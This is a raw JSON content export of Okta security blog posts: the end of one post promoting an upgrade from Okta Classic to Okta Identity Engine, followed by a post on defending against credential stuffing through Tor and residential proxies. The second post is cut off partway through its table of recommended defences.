\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/fastpass/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", hardware-protected MFA, and the exclusion of any authentication method by name, if you choose. 
We recommend higher assurance factors, specifically \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/10/phishing-resistant-mfa-shows-great-momentum/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing-resistant authentication.\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Passwordless\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Okta Classic, the default method of sign-in for any policy required the end user to provide a password, unless avoided via factor sequencing which can pose both flexibility and management challenges. To contribute to a  Zero Trust security framework, OIE enables password-specific capabilities including no password or optional password authentication conditions. 
Please note that both Okta Classic and OIE support factor sequencing.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OIE global session policies, again configurable for an entire org and not only on a per-application basis, can be tailored to require any factor type(s) used to meet the minimum configured authentication policy requirements, which can exclude a password.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For higher assurance, Okta recommends a combination of multiple factor types, specifically biometrics alongside phishing-resistant MFA such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/fastpass/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/mfa-webauthn.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIDO2\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". A lower-assurance alternative better suited to Customer Identity flows is a configured \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/authenticators-okta-email/-/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"email magic link\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" authentication sign-on policy, where end users will receive a URL via email for a click-to-login experience. Note that email magic links do not provide the phishing resistance of FastPass or FIDO2, so they should not be treated as an equivalent substitute where high assurance is required.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. 
Device assurance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Identity platforms both support native device assurance capabilities and seamlessly integrate with device management technologies to further secure your data, enforcing a Zero Trust security framework. Device trust contextual access management solutions enable orgs to protect sensitive corporate resources by only allowing end users with managed devices to access Okta-integrated applications. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits of device trust in OIE include advanced authentication configurations that factor in conditions such as the following (among others) to increase your device assurance posture:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device OS and/or type, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device password protection and length,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Registration status,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Whether the device is jailbroken or rooted.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OIE requires the use of Okta Verify to secure your org’s mobile devices. 
For more on translating device trust from Okta Classic to OIE, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Setting-Up-Desktop-Device-Trust-in-Okta-OIE-A-Guide-for-those-who-have-it-Implemented-in-Okta-Classic?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"knowledge base\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Improved admin experience\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Identity solutions consider the user experience which includes both end users authenticating and technical \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/administrators-admin-comparison.htm?cshid=ext-administrators-admin-comparison\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"administrators\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of the Okta org. Okta’s administrator console supports efficient, methodical Identity management.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Okta Classic, the admin console boasts the legacy navigation pane with condensed configuration pages, whereas Okta Identity Engine’s navigation pane introduces additional configuration pages, refined more granularly for ease of administrator use. 
In addition to the new customizable settings in OIE, certain pages have changed which notably introduce an easy-to-navigate user interface.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As previously highlighted, a key benefit is that application authentication policies in OIE can be configured by administrators and assigned to multiple applications in an Okta org, rather than applications uniquely requiring individual policies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Upgrade now\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ultimately, to best capitalize on Okta’s powerful Identity platforms and improve your security assurance posture, we strongly recommend upgrading your org from Okta Classic to Okta Identity Engine. The key benefits outlined here represent just a fraction of available functionality, ready for you to customize and leverage in your Okta org.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/product-hub/oie/upgrading-to-okta-identity-engine?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"helpful resources\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/oie-upgrade-eligibility.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"get started\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on the platform upgrade from Okta Classic to Okta Identity Engine, joining over 12,000 customers in taking advantage of 
the updated security features today. For additional support, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/group/0F94z000000XoN1CAK/okta-identity-engine-office-hours?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"register now\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"free\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"1-on-1 OIE office hours\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For new or prospective customers interested in OIE, we invite you to check out Okta’s industry-leading Identity solutions by signing up for a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"free \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/free-trial/?_gl=1*hqmasd*_gcl_aw*R0NMLjE3MjgzMzM5NjAuQ2owS0NRandqWTY0QmhDYUFSSXNBSWZjN1liU0puXzFYeTZhTjBuOTl6TEQyWkZvWFFwNXlZbXZkMUJUV2VmTGxrZ180MENmZHZRUWpRY2FBc01JRUFMd193Y0I.*_gcl_au*NjQ3Mjc3MzY3LjE3MjQ0MjE5NDI.*_ga*NTE0NTAxODM2LjE3MjQwOTM3NjA.*_ga_QKMSDV5369*MTcyODY1NTk2Ny4xMDcuMS4xNzI4NjU2NzA0LjQwLjAuMA\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"30-day trial\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" now! 
For more on OIE, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine-upgrade/faq.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"frequently asked questions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Okta’s Identity Engine offers the most modern way to customize your Okta experience and implement flexible, customized Identity use cases."},"updatedAt":"2025-02-09T23:47:31.380Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"<p>Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. 
Carmen spends her downtime traveling, thrifting for treasures and reading.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"}]},{"slug":"/blockanonymizers","id":"0449ba3a-2a32-5643-b57d-f119c515c74a","title":"How to Block Anonymizing Services using Okta","date":"2024-04-27T03:59:59+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the last month, Okta has observed an increase in the frequency and scale of credential stuffing attacks targeting online services, facilitated by the broad availability of residential proxy services, lists of previously stolen credentials (“combo lists”), and scripting tools.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From March 18, 2024 through to April 16, 2024, Duo Security and Cisco Talos \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"observed large-scale brute force attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on multiple models of VPN devices.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From April 19, 2024 through to April 26, 2024, Okta’s Identity Threat 
Research team observed a spike in credential stuffing activity against user accounts from what appears to be similar infrastructure.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In credential stuffing attacks, adversaries attempt to sign-in to online services using large lists of usernames and passwords obtained from previous data breaches of unrelated entities, or from phishing or malware campaigns.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All recent attacks we have observed share one feature in common: they rely on requests being routed through anonymizing services such as TOR. Millions of the requests were also routed through a variety of residential proxies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is the Tor Network?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tor (The Onion Router) provides its users a method of sending requests to web sites in which the originating source IP address of the request is obscured. Tor relies on the relay of messages across an overlay network of “onion routers”, each of which can only observe the IP of the preceding node and the next node in the communication. While Tor has legitimate uses, it is routinely used to conceal the real IP address of attackers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What are Residential Proxies?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Residential Proxies are networks of legitimate user devices that route traffic on behalf of a paid subscriber. 
Providers of residential proxies effectively rent access to route authentication requests through the computer, smartphone or router of a real user, and proxy traffic through the IP of these devices to anonymize the source of the traffic.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Residential Proxy providers don’t tend to advertise how they build these networks of real user devices. Sometimes a user device is enrolled in a proxy network because the user consciously chooses to download “proxyware” into their device in exchange for payment or something else of value. At other times, a user device is infected with malware without the user’s knowledge and becomes enrolled in what we would typically describe as a botnet. More recently, we have observed a large number of mobile devices used in proxy networks where the user has downloaded a mobile app developed using compromised SDKs (software development kits). Effectively, the developers of these apps have consented to or have been tricked into using an SDK that enrolls the device of any user running the app in a residential proxy network.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The net sum of this activity is that most of the traffic in these credential stuffing attacks appears to originate from the mobile devices and browsers of everyday users, rather than from the IP space of VPS providers. 
For more information on residential proxy services, we recommend this \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.orangecyberdefense.com/be/blog/unveiling-the-depths-of-residential-proxies-providers\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"informative summary\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by CERT Orange Cyberdefense and Sekoia.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Block it at the Edge\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the key tenets of the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is to champion customer security best practices. 
We are committed to raising the bar for default security features in our platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In February 2024, Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/allow-admins-to-detect-and-block-requests-from-anonymizers?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"released\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" a well-timed capability into the Okta Platform that detects and blocks requests from anonymizing services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizations that wish to deny access from specific anonymizers, and allowlist others, must first be licensed to use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Dynamic Zones\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", which is included in the Adaptive MFA SKU. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers using Auth0 should consider the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attack Protection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" Suite, and consider the other recommendations in the table below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Modern Defenses, Built into the Identity Platform\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The unprecedented scale of these attacks has provided clear insights into the controls most effective against credential stuffing.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/threat-insight/configure-threatinsight.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", Okta’s built-in control against high volume attacks, blocks requests from IPs involved in large scale credential based attacks prior to authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The small percentage of customers where these suspicious requests proceeded to authentication shared similar configurations: The Org was nearly always running on the Okta Classic Engine, ThreatInsight was configured in Audit-only mode (not Log and Enforce mode), and Authentication policies permitted requests from anonymizing 
proxies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers using Okta Identity Engine that (a) enabled ThreatInsight in log and enforce mode and (b) deny access requests from anonymizing proxies were protected from these opportunistic accounts. These basic features are available in all Okta SKUs. Upgrading to Okta Identity Engine is free, often highly automated, and provides access to a range of features including \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/api/openapi/okta-management/management/tag/CAPTCHA/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CAPTCHA\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" challenges for risky sign-ins and passwordless authentication using Okta FastPass.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Broader Recommendations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend Okta customers practice defense in depth to mitigate the risk of account takeovers from credential stuffing attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recommendation\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workforce Identity  and Customer 
Identity\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Embrace Passwordless \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"and \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIDO2 WebAuthn\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Support \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/authenticate/database-connections/passkeys\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"PassKeys\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" 
\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"as a preferred sign-in method\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prevent users from making poor password choices\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require 12 chars and no parts of username in \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Password Policy\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\". 
Block passwords found in \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/policies/configure-password-policies.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"common password list\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enable \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/breached-password-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Breached Password Protection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"or \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Guard\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" to prevent use of passwords known to have been breached in 3P 
sites\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce MFA on sign-in\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require MFA in Global Session Policies\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require MFA for Password Authentication flows\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"requests from locations where your organization does not operate\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network Zones\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" to block requests prior to 
